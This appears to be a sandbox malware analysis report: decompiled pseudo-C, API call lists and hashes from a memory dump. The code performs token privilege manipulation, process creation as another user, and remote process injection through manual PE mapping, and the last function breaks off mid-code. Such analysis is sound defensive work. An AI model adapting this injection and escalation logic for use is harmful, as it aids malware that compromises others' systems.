                          • CloseHandle.KERNEL32(?), ref: 006E1632
                          • CloseHandle.KERNEL32(?), ref: 006E163A
                          • GetCurrentProcess.KERNEL32 ref: 006E1643
                          • DuplicateHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000003), ref: 006E165C
                          • GetCurrentProcess.KERNEL32 ref: 006E1669
                          • DuplicateHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000003), ref: 006E1682
                          • GetCurrentProcess.KERNEL32 ref: 006E1691
                          • DuplicateHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000003), ref: 006E16AA
                          • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 006E16CD
                          • VirtualFreeEx.KERNEL32(?,?,00000070,00008000), ref: 006E16F0
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: Process$Handle$AddressProc$CurrentDuplicateMemory$Event$CreateVirtual$CloseReadWrite$AllocFreeResetThread$InformationModuleQueryRemoteResume
                          • String ID: Xh$p
                          • API String ID: 2079587854-3369398867
                          • Opcode ID: b454c1dfa6aac696573dba07aa76b2698031b7fa4e551fa383d32f8b84975e7e
                          • Instruction ID: f6f661727e7152bdba8bbcbfd561866ea3f69c5c7bade369b83dd1fc7142f801
                          • Opcode Fuzzy Hash: b454c1dfa6aac696573dba07aa76b2698031b7fa4e551fa383d32f8b84975e7e
                          • Instruction Fuzzy Hash: 72D14D70604344AFE7219F25DC49FABBBEAFF85340F14482DF9899A260DB71A944DF21
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 72%
                          			E006E5470(intOrPtr _a20) {
                          				int _v0;
                          				long _v28;
                          				WCHAR* _v32;
                          				intOrPtr* _v36;
                          				intOrPtr* _v40;
                          				char _v552;
                          				short _v1064;
                          				char _v1240;
                          				char _v1272;
                          				void _v1316;
                          				void* _v1320;
                          				struct _STARTUPINFOW _v1428;
                          				union _SID_NAME_USE _v1444;
                          				long _v1448;
                          				long _v1452;
                          				long _v1456;
                          				long _v1460;
                          				long _v1464;
                          				long _v1468;
                          				long _v1472;
                          				char _v1476;
                          				intOrPtr _v1480;
                          				struct _SID_IDENTIFIER_AUTHORITY _v1484;
                          				long _v1488;
                          				char _v1492;
                          				long _v1496;
                          				void* _v1500;
                          				long _v1504;
                          				void* _v1508;
                          				void* _v1512;
                          				void* _v1516;
                          				void* _v1520;
                          				long _v1524;
                          				intOrPtr _v1528;
                          				void* _v1532;
                          				char _v1536;
                          				void* _v1540;
                          				void* _v1544;
                          				void* _v1548;
                          				intOrPtr _v1556;
                          				void* _v1568;
                          				int _t95;
                          				intOrPtr _t96;
                          				void* _t97;
                          				intOrPtr _t98;
                          				void* _t99;
                          				intOrPtr _t107;
                          				int _t110;
                          				int _t112;
                          				int _t114;
                          				long _t115;
                          				void** _t116;
                          				int _t117;
                          				DWORD* _t118;
                          				int _t119;
                          				int _t120;
                          				int _t122;
                          				int _t125;
                          				int _t128;
                          				int _t130;
                          				int _t131;
                          				int _t132;
                          				void* _t134;
                          				struct _TOKEN_PRIVILEGES* _t147;
                          				DWORD* _t150;
                          				WCHAR* _t151;
                          				char* _t152;
                          				struct _STARTUPINFOW* _t153;
                          				int _t155;
                          				long _t158;
                          				int _t164;
                          				intOrPtr _t168;
                          				signed int _t174;
                          				void* _t176;
                          				void** _t178;
                          				WCHAR* _t179;
                          				union _SECURITY_IMPERSONATION_LEVEL _t180;
                          				intOrPtr _t181;
                          				intOrPtr _t182;
                          				void* _t186;
                          				void* _t187;
                          				HANDLE* _t189;
                          				void* _t191;
                          
                          				_t189 =  &_v1508;
                          				_t168 =  *0x6f9a8c; // 0x0
                          				_t180 = 0;
                          				_t153 =  &(_v1428.dwFlags);
                          				_v1516 = 0xffffffff;
                          				_v1484.Value = 0x100;
                          				_v1524 = 0;
                          				_v1504 = 0;
                          				_v1508 = 0;
                          				_v1492 = 0;
                          				_v1520 = 0;
                          				_v1512 = 0;
                          				_v1496 = 0;
                          				_v1472 = 0;
                          				_t153->cb = 0x44;
                          				_v1476 =  *0x6f9a90 & 0x0000ffff;
                          				_v1480 = _t168;
                          				GetStartupInfoW(_t153);
                          				_t191 =  *0x6f9c00 - _t180; // 0x73e71f81
                          				_v1456 = 0;
                          				_v1460 = 0;
                          				_v1464 = 0;
                          				_v1468 = 0;
                          				if(_t191 != 0 || E006F18C0(_t153, _t191) != 0) {
                          					_t181 = _a20;
                          					_v1488 = 0;
                          					if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v1520) != 0) {
                          						_t179 =  &_v1240;
                          						E006F4520(_t179, 0x5f);
                          						_t189 =  &(_t189[2]);
                          						if(LookupPrivilegeValueW(0, _t179,  &(_v1428.dwXCountChars)) != 0) {
                          							_t147 =  &(_v1428.dwYSize);
                          							_t147->PrivilegeCount = 1;
                          							_t147->Privileges[0].Luid = 2;
                          							AdjustTokenPrivileges(_v1520, 0, _t147, 0x10,  &(_v1428.lpTitle),  &_v1488);
                          						}
                          					}
                          					if(_t181 == 0) {
                          						_t95 =  *0x6f9c4c; // 0x73e74023
                          						__eflags = _t95;
                          						if(_t95 == 0) {
                          							L24:
                          							_t155 =  *0x6f9b80; // 0x0
                          							__eflags = _t155;
                          							if(_t155 == 0) {
                          								L42:
                          								_t180 = 0;
                          								_t187 = 0;
                          								_t178 = 0;
                          								__eflags = 0;
                          								L43:
                          								_t96 = _v1428.lpReserved;
                          								if(_t96 != 0) {
                          									 *0x6f9e90(_v1524, _t96);
                          								}
                          								_t97 = _v1524;
                          								if(_t97 != 0) {
                          									CloseHandle(_t97);
                          								}
                          								_t98 = _v1504;
                          								if(_t98 != 0) {
                          									 *0x6f9e88(_t98);
                          								}
                          								if(_t178 != 0) {
                          									E006E91E0(_t187);
                          								}
                          								_t99 = _v1520;
                          								if(_t99 != 0) {
                          									AdjustTokenPrivileges(_t99, 0,  &(_v1428.lpTitle), 0x10, 0, 0);
                          									CloseHandle(_v1520);
                          								}
                          								goto L53;
                          							}
                          							_t107 =  *_t155();
                          							_t182 = _t107;
                          							__eflags = _t107 - 0xffffffff;
                          							if(_t107 == 0xffffffff) {
                          								goto L42;
                          							}
                          							L26:
                          							RevertToSelf();
                          							_t110 =  *0x6f9c00(_t182,  &_v1516);
                          							L27:
                          							__eflags = _t110;
                          							if(_t110 == 0) {
                          								goto L42;
                          							}
                          							_t180 = 1;
                          							_t112 = DuplicateTokenEx(_v1524, 0x2000000, 0, 1, 1, _t189);
                          							__eflags = _t112;
                          							if(_t112 == 0) {
                          								goto L42;
                          							}
                          							CloseHandle(_v1532);
                          							_t150 =  &_v1516;
                          							 *_t150 = 0;
                          							_t114 = GetTokenInformation(_v1540, 1, 0, 0, _t150);
                          							__eflags = _t114;
                          							_t178 = 0;
                          							if(_t114 == 0) {
                          								_t115 = GetLastError();
                          								__eflags = _t115 - 0x7a;
                          								if(_t115 != 0x7a) {
                          									goto L42;
                          								}
                          								_t116 = E006E3180(_v1520, 0);
                          								_t189 =  &(_t189[2]);
                          								_t178 = _t116;
                          								__eflags = _t116;
                          								if(_t116 == 0) {
                          									L11:
                          									_t180 = 0;
                          									_t187 = 0;
                          									goto L43;
                          								}
                          								_t187 = _t178;
                          							}
                          							_t117 = GetTokenInformation(_v1544, 1, _t187, _v1520, _t150);
                          							__eflags = _t117;
                          							if(_t117 == 0) {
                          								L38:
                          								_t180 = 0;
                          								goto L43;
                          							}
                          							_t118 =  &_v1508;
                          							_t151 =  &_v552;
                          							_v1064 = 0;
                          							 *_t118 = 0x100;
                          							 *_t151 = 0;
                          							_t119 = LookupAccountSidW(0,  *_t178, _t151, _t118,  &_v1064, _t118,  &_v1444);
                          							__eflags = _t119;
                          							if(_t119 == 0) {
                          								goto L38;
                          							}
                          							_t120 = _v0;
                          							_t158 = 0;
                          							_v1448 = 0;
                          							_v1452 = 0;
                          							_v1456 = 0;
                          							_v1460 = 0;
                          							_v1464 = 0;
                          							_v1472 = 0;
                          							_v1476 = 0x20;
                          							_v1468 = _t151;
                          							__eflags = _t120;
                          							if(_t120 == 0) {
                          								L34:
                          								_t122 =  *0x6f9e84(_v1548,  &_v1476);
                          								__eflags = _t122;
                          								if(_t122 == 0) {
                          									goto L38;
                          								}
                          								_v1428.hStdOutput = 0;
                          								_t152 =  &_v1272;
                          								E006F4520(_t152, 0x9d);
                          								_t189 =  &(_t189[2]);
                          								_v1428.dwY = _t152;
                          								_t125 =  *0x6f9e8c( &_v1536, _v1556, 0);
                          								__eflags = _t125;
                          								if(_t125 == 0) {
                          									goto L38;
                          								}
                          								_t128 = CreateProcessAsUserW(_v1568, 0, _v32, 0, 0, 0, _v28, _v1548, 0,  &_v1428,  &_v1512);
                          								__eflags = _t128;
                          								if(_t128 == 0) {
                          									goto L38;
                          								}
                          								 *_v40 = _v1512;
                          								 *_v36 = _v1508;
                          								goto L43;
                          							} else {
                          								goto L33;
                          							}
                          							do {
                          								L33:
                          								_t174 =  *(_t189 + _t158 + 0x3e4) & 0x0000ffff;
                          								 *(_t120 + _t158) = _t174;
                          								_t158 = _t158 + 2;
                          								__eflags = _t174;
                          							} while (_t174 != 0);
                          							goto L34;
                          						}
                          						_t130 =  *_t95(0, 0, 1,  &_v1508,  &_v1492);
                          						__eflags = _t130;
                          						if(_t130 == 0) {
                          							goto L24;
                          						}
                          						_t131 = _v1512;
                          						_t182 = 0xffffffffffffffff;
                          						__eflags = _t131;
                          						if(_t131 == 0) {
                          							L21:
                          							_t132 =  *0x6f9be8; // 0x73e71b65
                          							__eflags = _t132;
                          							if(_t132 != 0) {
                          								 *_t132(_v1528);
                          							}
                          							__eflags = _t182 - 0xffffffff;
                          							if(_t182 != 0xffffffff) {
                          								goto L26;
                          							} else {
                          								goto L24;
                          							}
                          						}
                          						_t176 = 0;
                          						_t164 = _v1528 + 8;
                          						__eflags = _t164;
                          						while(1) {
                          							__eflags =  *_t164;
                          							if( *_t164 == 0) {
                          								break;
                          							}
                          							_t176 = _t176 + 1;
                          							_t164 = _t164 + 0xc;
                          							__eflags = _t176 - _t131;
                          							if(_t176 < _t131) {
                          								continue;
                          							}
                          							goto L21;
                          						}
                          						_t182 =  *((intOrPtr*)(_t164 - 8));
                          						goto L21;
                          					}
                          					_t134 = OpenProcess(0x1fffff, 0,  *(_t181 + 4));
                          					if(_t134 == 0) {
                          						goto L42;
                          					}
                          					_t186 = _t134;
                          					if(OpenProcessToken(_t186, 8,  &_v1512) == 0 || GetTokenInformation(_v1512, 1,  &_v1316, 0x4c,  &_v1472) == 0) {
                          						goto L42;
                          					} else {
                          						_t178 = 0;
                          						if(AllocateAndInitializeSid( &_v1484, 1, 0x12, 0, 0, 0, 0, 0, 0, 0,  &_v1500) == 0 || EqualSid(_v1320, _v1500) == 0) {
                          							CloseHandle(_v1516);
                          							_t110 = OpenProcessToken(_t186, 2,  &_v1520);
                          							goto L27;
                          						} else {
                          							goto L11;
                          						}
                          					}
                          				} else {
                          					L53:
                          					return _t180;
                          				}
                          			}

                          (instruction-address column for E006E5470, 0x006e5474 through 0x006e58e5; the report renders one address beside each decompiled line above, with 0x00000000 for lines without code, but this text extraction does not keep the side-by-side alignment)

                          APIs
                          • GetStartupInfoW.KERNEL32(?), ref: 006E54CF
                          • GetCurrentProcess.KERNEL32 ref: 006E5509
                          • OpenProcessToken.ADVAPI32(00000000,00000028,?), ref: 006E5517
                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 006E553E
                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,?,?), ref: 006E556C
                          • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 006E5584
                          • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 006E559C
                          • GetTokenInformation.ADVAPI32(?,00000001(TokenUser),?,0000004C,?), ref: 006E55BF
                          • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 006E55E4
                          • EqualSid.ADVAPI32(?,?), ref: 006E55F9
                          • CloseHandle.KERNEL32(?), ref: 006E5892
                            • Part of subcall function 006F18C0: LoadLibraryW.KERNEL32(?), ref: 006F18DC
                            • Part of subcall function 006F18C0: GetProcAddress.KERNEL32(00000000), ref: 006F18FD
                            • Part of subcall function 006F18C0: GetProcAddress.KERNEL32(00000000), ref: 006F1911
                            • Part of subcall function 006F18C0: GetProcAddress.KERNEL32(00000000), ref: 006F1925
                            • Part of subcall function 006F18C0: GetProcAddress.KERNEL32(00000000), ref: 006F1939
                          • CloseHandle.KERNEL32(?), ref: 006E5652
                          • OpenProcessToken.ADVAPI32(00000000,00000002,FFFFFFFF), ref: 006E5660
                          • RevertToSelf.ADVAPI32 ref: 006E569A
                          • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001), ref: 006E56C7
                          • CloseHandle.KERNEL32(FFFFFFFF), ref: 006E56D9
                          • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 006E56F0
                          • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 006E570F
                          • LookupAccountSidW.ADVAPI32(00000000,?,?,00000100,?,00000100,?), ref: 006E574E
                          • CreateProcessAsUserW.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?), ref: 006E581D
                          • GetLastError.KERNEL32 ref: 006E5847
                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 006E58C9
                          • CloseHandle.KERNEL32(?), ref: 006E58D3
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: Token$Process$AddressCloseHandleOpenProc$Information$AdjustLookupPrivileges$AccountAllocateCreateCurrentDuplicateEqualErrorInfoInitializeLastLibraryLoadPrivilegeRevertSelfStartupUserValue
                          • String ID:
                          • API String ID: 896487261-3916222277
                          • Opcode ID: 4f4843edd1fd936821691727b56b4c936eabc0d34232ec55b06e010286ddc87f
                          • Instruction ID: ce39252ce57d30ffd2a469b59e324e2bb411f306cbe1415cc5a79b9086ae66ea
                          • Opcode Fuzzy Hash: 4f4843edd1fd936821691727b56b4c936eabc0d34232ec55b06e010286ddc87f
                          • Instruction Fuzzy Hash: 56C17F70609751AFE7248F61DC44BABBBEAFF84744F00491DF586C62A0DBB1D905CB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 85%
                          			E006F0920(void* __ecx, void* __eflags) {
                          				void* _v16;
                          				long _v128;
                          				void* _v132;
                          				long _v136;
                          				intOrPtr _v140;
                          				intOrPtr _v144;
                          				intOrPtr _v148;
                          				intOrPtr _v152;
                          				long* _v156;
                          				long _v160;
                          				char _v164;
                          				signed short* _v168;
                          				long _v172;
                          				void* _v176;
                          				intOrPtr _v180;
                          				long* _v184;
                          				long _v192;
                          				void _v196;
                          				void _v200;
                          				long _v204;
                          				intOrPtr _v208;
                          				long* _v212;
                          				intOrPtr _v216;
                          				intOrPtr _v220;
                          				intOrPtr _v224;
                          				intOrPtr _v228;
                          				long _v232;
                          				intOrPtr _v236;
                          				long _v240;
                          				void* _v244;
                          				void* _v248;
                          				void* _v252;
                          				void* _v256;
                          				long _v260;
                          				long _v264;
                          				long _v268;
                          				long _v272;
                          				intOrPtr _v276;
                          				void* _v280;
                          				void* _v284;
                          				long _v288;
                          				long _v292;
                          				long _v296;
                          				intOrPtr _t299;
                          				void* _t300;
                          				void* _t302;
                          				intOrPtr _t312;
                          				long _t316;
                          				long _t317;
                          				long _t318;
                          				long* _t321;
                          				intOrPtr _t322;
                          				void* _t323;
                          				unsigned int _t326;
                          				intOrPtr _t327;
                          				long _t328;
                          				long _t337;
                          				signed int _t338;
                          				long _t342;
                          				long _t346;
                          				long _t350;
                          				long _t352;
                          				long _t354;
                          				long _t357;
                          				long _t359;
                          				long _t360;
                          				long* _t361;
                          				long _t362;
                          				signed int _t363;
                          				long _t364;
                          				intOrPtr _t367;
                          				void* _t368;
                          				long _t369;
                          				signed short* _t370;
                          				unsigned int _t372;
                          				intOrPtr* _t374;
                          				intOrPtr _t383;
                          				void* _t385;
                          				long _t390;
                          				void* _t394;
                          				long* _t395;
                          				long _t397;
                          				void* _t398;
                          				long _t401;
                          				long _t404;
                          				long _t426;
                          				long* _t430;
                          				long _t431;
                          				long** _t434;
                          				long _t437;
                          				long _t448;
                          				long _t449;
                          				void* _t464;
                          				void* _t467;
                          				SIZE_T* _t469;
                          				intOrPtr _t471;
                          				long _t473;
                          				intOrPtr _t476;
                          				intOrPtr* _t480;
                          				intOrPtr _t481;
                          				long _t483;
                          				long _t486;
                          				intOrPtr _t487;
                          				long _t488;
                          				long _t490;
                          				long _t491;
                          				void* _t493;
                          				long* _t495;
                          				long _t496;
                          				void* _t497;
                          				signed int _t499;
                          				void _t501;
                          				void _t504;
                          				long _t506;
                          				long _t507;
                          				void* _t508;
                          				signed int _t509;
                          				void* _t512;
                          				void* _t514;
                          
                          				_t508 = __ecx;
                          				_t486 = 0;
                          				E006F6610( &_v280, 0, 0x100);
                          				_t512 = (_t509 & 0xfffffff8) - 0x118 + 0xc;
                          				if( *((intOrPtr*)(_t508 + 0x80)) != 0) {
                          					L26:
                          					return _t486;
                          				}
                          				E006F7C90( *(_t508 + 0x60),  *((intOrPtr*)(_t508 + 0x64)));
                          				_t514 = _t512 + 8;
                          				_t394 =  *(_t508 + 0x60);
                          				_v280 = _t394;
                          				if(( *_t394 & 0x0000ffff) != 0x5a4d) {
                          					L21:
                          					_t529 =  *((intOrPtr*)(_t508 + 0x80));
                          					if( *((intOrPtr*)(_t508 + 0x80)) == 0) {
                          						E006F5320(_t508, _t529);
                          					}
                          					L23:
                          					_t295 = _v244;
                          					if(_v244 != 0) {
                          						E006E91E0(_t295);
                          						_t514 = _t514 + 4;
                          					}
                          					E006F7C90( *(_t508 + 0x60),  *((intOrPtr*)(_t508 + 0x64)));
                          					_t486 =  *((intOrPtr*)(_t508 + 0x5c));
                          					goto L26;
                          				}
                          				_t299 =  *((intOrPtr*)(_t394 + 0x3c));
                          				_t487 = _t394 + _t299;
                          				_v276 = _t487;
                          				if( *((intOrPtr*)(_t394 + _t299)) != 0x4550) {
                          					goto L21;
                          				}
                          				_t300 = VirtualAllocEx( *(_t508 + 0x70),  *(_t487 + 0x34),  *(_t487 + 0x50), 0x2000, 0x40);
                          				_v256 = _t300;
                          				if(_t300 == 0) {
                          					__eflags = GetLastError() - 0x1e7;
                          					if(__eflags != 0) {
                          						goto L21;
                          					}
                          					_t300 = VirtualAllocEx( *(_t508 + 0x70), 0,  *(_t487 + 0x50), 0x2000, 0x40);
                          					__eflags = _t300;
                          					_v256 = _t300;
                          					if(__eflags != 0) {
                          						goto L4;
                          					}
                          					goto L21;
                          				}
                          				L4:
                          				_v232 = _t300 -  *(_t487 + 0x34);
                          				_t302 = VirtualAllocEx( *(_t508 + 0x70), _t300,  *(_t487 + 0x54), 0x1000, 4);
                          				_v252 = _t302;
                          				if(_t302 == 0) {
                          					goto L21;
                          				}
                          				_v284 =  *((intOrPtr*)(_t487 + 0x80));
                          				_v288 = _t302;
                          				_v268 = E006E9E90(_t508,  *((intOrPtr*)(_t487 + 0x80)));
                          				_t469 =  &_v296;
                          				_v232 = _v288;
                          				_v228 =  *((intOrPtr*)(_t487 + 0x84));
                          				_v224 =  *((intOrPtr*)(_t487 + 0xd8));
                          				_v220 =  *((intOrPtr*)(_t487 + 0xdc));
                          				_v216 =  *((intOrPtr*)(_t487 + 0x78));
                          				_v212 =  *((intOrPtr*)(_t487 + 0x7c));
                          				 *((intOrPtr*)(_t487 + 0xd8)) = 0;
                          				 *((intOrPtr*)(_t487 + 0xdc)) = 0;
                          				 *((intOrPtr*)(_t487 + 0x84)) = 0;
                          				 *((intOrPtr*)(_t487 + 0x80)) = 0;
                          				 *((intOrPtr*)(_t487 + 0x7c)) = 0;
                          				 *((intOrPtr*)(_t487 + 0x78)) = 0;
                          				_t488 =  *(_t487 + 0x54);
                          				 *_t469 = 0;
                          				if(WriteProcessMemory( *(_t508 + 0x70), _v292, _t394, _t488, _t469) == 0 || _v292 != _t488) {
                          					goto L21;
                          				} else {
                          					_t312 = _v276;
                          					 *((intOrPtr*)(_t312 + 0x80)) = _v228;
                          					 *((intOrPtr*)(_t312 + 0x84)) = _v224;
                          					 *((intOrPtr*)(_t312 + 0xd8)) = _v220;
                          					 *((intOrPtr*)(_t312 + 0xdc)) = _v216;
                          					 *((intOrPtr*)(_t312 + 0x78)) = _v212;
                          					 *((intOrPtr*)(_t312 + 0x7c)) = _v208;
                          					_v292 = 0;
                          					if(VirtualProtectEx( *(_t508 + 0x70), _v252,  *(_t312 + 0x54), 2,  &_v292) == 0) {
                          						goto L21;
                          					}
                          					_t471 = _v276;
                          					_t316 = _t471 + ( *(_t471 + 0x14) & 0x0000ffff) + 0x18;
                          					_v272 = _t316;
                          					if( *(_t471 + 6) == 0) {
                          						L27:
                          						__eflags = _v232;
                          						if(_v232 == 0) {
                          							L41:
                          							_t490 = _v264;
                          							__eflags = _t490;
                          							if(_t490 == 0) {
                          								L64:
                          								__eflags =  *(_t508 + 0x68);
                          								if( *(_t508 + 0x68) == 0) {
                          									_t395 = _v212;
                          									_t317 = E006E9E90(_t508, _t395);
                          									__eflags = _t317;
                          									_v264 = _t317;
                          									if(__eflags == 0) {
                          										goto L21;
                          									}
                          									_t491 = _t317;
                          									_t318 = E006E9E90(_t508,  *((intOrPtr*)(_t317 + 0x1c)));
                          									_v288 = _t318;
                          									_v160 = _t318;
                          									_v160 = E006E9E90(_t508,  *((intOrPtr*)(_t491 + 0x20)));
                          									_v160 = E006E9E90(_t508,  *((intOrPtr*)(_t491 + 0x24)));
                          									_v156 = _t395;
                          									_v152 = _t395 + _v220;
                          									__eflags =  *(_t491 + 0x14);
                          									if( *(_t491 + 0x14) == 0) {
                          										_t321 = _t508 + 0xa0;
                          										L103:
                          										__eflags =  *_t321;
                          										if(__eflags == 0) {
                          											goto L21;
                          										}
                          										__eflags =  *(_t508 + 0xa4);
                          										if(__eflags == 0) {
                          											goto L21;
                          										}
                          										__eflags =  *(_t508 + 0xa8);
                          										if(__eflags == 0) {
                          											goto L21;
                          										}
                          										__eflags =  *(_t508 + 0xac);
                          										if(__eflags != 0) {
                          											goto L65;
                          										}
                          										goto L21;
                          									}
                          									_t430 = _v284;
                          									_t398 = 0;
                          									_v288 = _t508 + 0xa0;
                          									while(1) {
                          										_v156 =  &(_t430[1]);
                          										_t337 =  *_t430;
                          										__eflags = _t337;
                          										_v136 = _t337;
                          										if(_t337 == 0) {
                          											goto L100;
                          										}
                          										__eflags = _t337 - _v144;
                          										if(_t337 < _v144) {
                          											L87:
                          											_t431 =  *(_t491 + 0x18);
                          											__eflags = _t431;
                          											if(_t431 == 0) {
                          												goto L100;
                          											}
                          											_t476 = _v148;
                          											_t338 = 0;
                          											__eflags = 0;
                          											while(1) {
                          												__eflags = _t398 - ( *(_t476 + _t338 * 2) & 0x0000ffff);
                          												if(_t398 == ( *(_t476 + _t338 * 2) & 0x0000ffff)) {
                          													break;
                          												}
                          												_t338 = _t338 + 1;
                          												__eflags = _t338 - _t431;
                          												if(_t338 < _t431) {
                          													continue;
                          												}
                          												goto L100;
                          											}
                          											_v132 = 0;
                          											_v136 = E006E9E90(_t508,  *((intOrPtr*)(_v152 + _t338 * 4)));
                          											_t495 =  &_v128;
                          											E006F7160(_t495, 0x60);
                          											_t514 = _t514 + 8;
                          											_t342 =  *((intOrPtr*)( *0x6f9d8c))(_v136, _t495);
                          											__eflags = _t342;
                          											if(_t342 == 0) {
                          												 *_v296 = _v264 + _v144;
                          											} else {
                          												E006F7160(_t495, 0x61);
                          												_t514 = _t514 + 8;
                          												_t346 =  *0x6f9d8c(_v140, _t495);
                          												__eflags = _t346;
                          												if(_t346 == 0) {
                          													 *(_t508 + 0xa4) = _v272 + _v152;
                          												} else {
                          													E006F7160(_t495, 0x62);
                          													_t514 = _t514 + 8;
                          													_t350 =  *0x6f9d8c(_v148, _t495);
                          													__eflags = _t350;
                          													if(_t350 == 0) {
                          														_t352 = _v280 + _v160;
                          														__eflags = _t352;
                          														 *(_t508 + 0xa8) = _t352;
                          													} else {
                          														E006F7160(_t495, 0x63);
                          														_t514 = _t514 + 8;
                          														_t354 =  *0x6f9d8c(_v156, _t495);
                          														__eflags = _t354;
                          														if(_t354 == 0) {
                          															 *(_t508 + 0xac) = _v168 + _v288;
                          														}
                          													}
                          												}
                          											}
                          											goto L100;
                          										}
                          										__eflags = _t337 - _v140;
                          										if(_t337 < _v140) {
                          											goto L100;
                          										}
                          										goto L87;
                          										L100:
                          										_t491 = _v260;
                          										_t398 = _t398 + 1;
                          										__eflags = _t398 -  *(_t491 + 0x14);
                          										if(_t398 <  *(_t491 + 0x14)) {
                          											_t430 = _v156;
                          											continue;
                          										}
                          										_t321 = _v288;
                          										goto L103;
                          									}
                          								}
                          								L65:
                          								_t322 = _v276;
                          								__eflags =  *((short*)(_t322 + 6));
                          								if( *((short*)(_t322 + 6)) == 0) {
                          									L77:
                          									_t323 = _v256;
                          									 *((intOrPtr*)(_t508 + 0x5c)) = _t323;
                          									_v292 = 0;
                          									_push(0);
                          									_push(1);
                          									_push(_t323);
                          									_push( &_v292);
                          									_push(3);
                          									_push( *((intOrPtr*)( *(_t508 + 0x60) +  *((intOrPtr*)( *(_t508 + 0x60) + 0x3c)) + 0x28)) + _t323);
                          									_push(_t508);
                          									E006F3FA0();
                          									_t514 = _t514 + 0x1c;
                          									__eflags = _v292;
                          									if(_v292 != 0) {
                          										L79:
                          										 *((intOrPtr*)(_t508 + 0x80)) = 1;
                          										goto L23;
                          									}
                          									__eflags =  *(_t508 + 0x68);
                          									if(__eflags == 0) {
                          										goto L21;
                          									}
                          									goto L79;
                          								}
                          								_t493 = 0;
                          								__eflags = 0;
                          								_t397 = 8;
                          								do {
                          									_t473 = _v272;
                          									_t326 =  *(_t473 + _t397 + 0x1c);
                          									asm("bt eax, 0x1d");
                          									if(__eflags < 0) {
                          										asm("bt eax, 0x1e");
                          										if(__eflags >= 0) {
                          											__eflags = _t326;
                          											_t327 = 0x10;
                          											_t426 = 0x80;
                          											L74:
                          											_t328 =  <  ? _t426 : _t327;
                          											L75:
                          											_v128 = _t328;
                          											_v288 =  *((intOrPtr*)(_t473 + _t397));
                          											_v292 = 0;
                          											_v284 =  *(_t508 + 0x70);
                          											__eflags = VirtualProtectEx(_v284, _v256 +  *((intOrPtr*)(_t473 + _t397 + 4)), _v288, _t328,  &_v292);
                          											if(__eflags == 0) {
                          												goto L21;
                          											}
                          											goto L76;
                          										}
                          										_t328 = (_t326 >> 0x0000001a & 0xffffffe0) + 0x20;
                          										goto L75;
                          									}
                          									asm("bt eax, 0x1e");
                          									if(__eflags >= 0) {
                          										__eflags = _t326;
                          										_t327 = 1;
                          										_t426 = 8;
                          										goto L74;
                          									}
                          									_t328 = (_t326 >> 0x1f) + (_t326 >> 0x1f) + 2;
                          									goto L75;
                          									L76:
                          									_t493 = _t493 + 1;
                          									_t397 = _t397 + 0x28;
                          									__eflags = _t493 - ( *(_v276 + 6) & 0x0000ffff);
                          								} while (__eflags < 0);
                          								goto L77;
                          							}
                          							_t434 =  &_v184;
                          							while(1) {
                          								__eflags =  *_t490;
                          								if( *_t490 != 0) {
                          									goto L61;
                          								}
                          								L57:
                          								__eflags =  *(_t490 + 0x10);
                          								if( *(_t490 + 0x10) != 0) {
                          									goto L61;
                          								}
                          								__eflags =  *(_t490 + 8);
                          								if( *(_t490 + 8) != 0) {
                          									goto L61;
                          								}
                          								__eflags =  *(_t490 + 0xc);
                          								if( *(_t490 + 0xc) != 0) {
                          									goto L61;
                          								}
                          								__eflags =  *(_t490 + 4);
                          								if( *(_t490 + 4) == 0) {
                          									goto L64;
                          								}
                          								L61:
                          								_v164 = 0;
                          								 *((intOrPtr*)(_t434 + 0xc)) = 0;
                          								 *((intOrPtr*)(_t434 + 8)) = 0;
                          								 *((intOrPtr*)(_t434 + 4)) = 0;
                          								 *_t434 = 0;
                          								_t357 =  *(_t490 + 0xc);
                          								__eflags = _t357;
                          								if(_t357 == 0) {
                          									do {
                          										__eflags =  *_t490;
                          										if( *_t490 != 0) {
                          											goto L61;
                          										}
                          										goto L57;
                          									} while (_t357 == 0);
                          								}
                          								_t359 = E006E6740(_t508, __eflags, E006E9E90(_t508, _t357));
                          								__eflags = _t359;
                          								_v192 = _t359;
                          								if(__eflags != 0) {
                          									_t496 = _v264;
                          									_t360 =  *_t496;
                          									_v160 = _t360;
                          									__eflags = _t360;
                          									_t437 =  *(_t496 + 0x10);
                          									if(_t360 == 0) {
                          										_t360 = _t437;
                          										_v160 = _t437;
                          									}
                          									_v288 = _t437;
                          									_t361 = E006E9E90(_t508, _t360);
                          									_v184 = _t361;
                          									_v180 = _v292 + _v260;
                          									_t362 =  *_t361;
